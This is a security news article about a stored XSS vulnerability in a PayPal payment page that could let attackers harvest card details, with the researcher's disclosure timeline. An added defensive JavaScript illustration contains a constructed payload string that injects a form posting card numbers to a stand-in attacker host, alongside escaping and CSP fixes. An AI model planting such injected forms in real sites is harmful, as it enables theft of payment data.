Critical PayPal flaw allows attackers to steal all your funds

Pierluigi Paganini August 26, 2015

The expert Ebrahim Hegazy discovered a critical Stored XSS vulnerability in PayPal that could be used to steal users' credit cards in cleartext format.

The popular security expert Ebrahim Hegazy (@Zigoo0) has discovered a critical Stored XSS vulnerability in “” that could be exploited by attackers to steal PayPal users' credit card and login credentials … and more!

The PayPal SecurePayments domain is used by PayPal users to make secure payments when purchasing from any shopping site.

This secure payments page requires PayPal users to fill in forms that include their credit card number, CVV2, expiry date and more. This information is necessary to finalize the payment and purchase the chosen products via their PayPal account.

The submitted data is processed through an encrypted channel (HTTPS), so attackers won’t be able to sniff/steal such data.

“I’ve found a Stored XSS vulnerability that affects the SecurePayment page directly which allowed me to alter the page HTML and rewrite the page content. An attacker can provide his own HTML forms to the user to fulfill and send the users' data back to attacker’s server in clear text format, and then use this information to purchase anything on behalf of users or even transfer the users' funds to his own account!” wrote the expert in a blog post.

What are the attack scenarios?

Ebrahim explained that the worst attack scenario is:

  • Attacker sets up a shopping site or hacks into any shopping site, and alters the “CheckOut” button with the Paypal vulnerability,
  • Paypal user browses the malformed shopping site, chooses some products, clicks on the “CheckOut” button to pay with his Paypal account,
  • User gets redirected to to fill the required credit card information to complete the purchasing order. In the same page, the products price that will be paid is included inside the same page, and as we know the attacker now controls this page!
  • Now when the Paypal user clicks on the Submit Payment button, instead of paying let’s say “100$” YOU WILL PAY THE ATTACKER WHATEVER AMOUNT THE ATTACKER DECIDES!!
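The class of bug behind this scenario, shown from the defender's side as an added illustration (not code from PayPal or from the researcher's write-up): a stored value rendered as markup versus encoded at output time, with a Content-Security-Policy and a regression check for forms that post off-site. The field name, page markup and origins are assumptions, since the article does not say which stored value was affected.

```javascript
// Added illustration: field names, markup and origins are hypothetical.
// Constructed stored value: merchant-supplied text that carries form markup.
const storedItemName =
  'Blue mug</span><form action="https://attacker.example/collect" method="post">' +
  '<input name="card_number"></form><span>';

// Encode the characters that are significant in HTML text and quoted attributes.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Shared page template: one legitimate payment form posting to the page's own origin.
function page(itemHtml, amount) {
  return '<form action="/pay" method="post">' + itemHtml +
    '<span class="total">' + escapeHtml(amount) + '</span>' +
    '<input name="card_number"><button>Submit Payment</button></form>';
}

// Before: the stored value is concatenated into the page as markup.
function renderCheckoutUnsafe(itemName, amount) {
  return page('<span class="item">' + itemName + '</span>', amount);
}

// After: the stored value is encoded for the HTML text context at output time.
function renderCheckoutSafe(itemName, amount) {
  return page('<span class="item">' + escapeHtml(itemName) + '</span>', amount);
}

// Defence in depth, sent as the Content-Security-Policy response header: no inline
// script, and the browser refuses to submit any form to another origin.
const CSP = "default-src 'self'; script-src 'self'; form-action 'self'; base-uri 'none'";

// Regression check for rendered pages: list form actions that leave the page origin.
// A regex is enough for this constructed markup; use a real HTML parser in production.
function offSiteFormActions(html, pageOrigin) {
  const actions = [...html.matchAll(/<form\b[^>]*\baction\s*=\s*"([^"]*)"/gi)].map((m) => m[1]);
  return actions.filter((a) => new URL(a, pageOrigin).origin !== pageOrigin);
}

const PAGE_ORIGIN = 'https://pay.example';
console.log(offSiteFormActions(renderCheckoutUnsafe(storedItemName, '100.00'), PAGE_ORIGIN));
console.log(offSiteFormActions(renderCheckoutSafe(storedItemName, '100.00'), PAGE_ORIGIN));
```

The unsafe render reports the off-site form action, while the encoded render reports none because the stored markup is displayed as inert text.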

The expert published a video PoC that shows how the attacker exploits the vulnerability to steal the user's credit card and login credentials.

The expert ethically reported the flaw to PayPal, which promptly fixed it. This is the timeline of the bug:

  • Vulnerability Discovery: 19/Jun/15 2:27 AM
  • Vulnerability Reported: 19/Jun/15 7:10 AM
  • Remediation Notification: Aug 25, 2015 at 5:44 AM

Thanks to the Paypal Security team for the good coordination and the fast responses to emails.

Pierluigi Paganini

(Security Affairs – hacking, PayPal)
